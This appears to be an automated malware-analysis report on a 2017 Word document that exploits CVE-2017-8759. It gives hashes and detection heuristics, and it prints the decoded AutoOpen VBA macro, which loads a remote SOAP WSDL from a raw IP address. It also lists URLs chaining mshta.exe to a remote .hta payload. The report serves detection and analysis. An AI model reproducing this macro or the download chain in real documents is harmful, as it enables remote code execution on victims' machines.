Office (OLE) malware analysis — malicious · a9392fbbade13f48

MALICIOUS

Office (OLE)

62.5 KB Created: 2017-09-13 09:34:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: bce30f8d7e8110247170478a13272144 SHA-1: 7eebcecc5125f01dc778801ed0b93650ec85c418 SHA-256: a9392fbbade13f4819ffc694d03b372266ec94db068cb6a9ef0acca0e99fa9c2

230 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample contains VBA macros that leverage the AutoOpen function to execute a command. The script uses GetObject to load content from a URL, which is then used to execute mshta.exe. This indicates an attempt to download and run a second-stage payload, likely a malicious script or executable, from the provided URL. The ClamAV detection for Win.Exploit.CVE_2017_8759-6336226-0 further supports the exploitation of a known vulnerability.

Heuristics 8

ClamAV: Win.Exploit.CVE_2017_8759-6336226-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Exploit.CVE_2017_8759-6336226-0
Reference to mshta.exe high SC_STR_MSHTA

Reference to mshta.exe
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

        Set variablex = GetObject("soap:wsdl=http://212.83.169.241/d/final.txt")

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Customizable = True
Sub AutoOpen()
'Sub Open
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://212.83.169.241/d/?C:\Windows\System32\mshta.exe?http://212.83.169.241/d/cmd.hta In document text (OLE body)
- http://212.83.169.241/d/final.txtIn document text (OLE body)
- http://212.83.169.241/d/?CIn document text (OLE body)
- http://212.83.169.241/d/cmd.htaIn document text (OLE body)
- http://schemas.xmlsoap.org/wsdl/In document text (OLE body)
- http://schemas.xmlsoap.org/wsdl/soap/In document text (OLE body)
- http://www.w3.org/2000/wsdl/sudsIn document text (OLE body)
- http://schemas.microsoft.com/clr/ns/SystemIn document text (OLE body)
- http://schemas.microsoft.com/clr/nsassem/Logo/LogoIn document text (OLE body)
- http://schemas.xmlsoap.org/soap/httpIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 578 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	578 bytes
SHA-256: `d70576cc3ab5e63f5aa8056e021cb16b2ffb51e9533143a837e5acbf54e8bb03`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() 'Sub Open 'Testing 'Setting Variable To Load From Link Set variablex = GetObject("soap:wsdl=http://212.83.169.241/d/final.txt") 'Loading Code To Main Real Variable Set x = variablex 'End Test 'Sub Close End Sub

SHA-256: d70576cc3ab5e63f5aa8056e021cb16b2ffb51e9533143a837e5acbf54e8bb03

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'Sub Open

'Testing

'Setting Variable To Load From Link

        Set variablex = GetObject("soap:wsdl=http://212.83.169.241/d/final.txt")
        
'Loading Code To Main Real Variable

        Set x = variablex
        

'End Test
        
'Sub Close
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.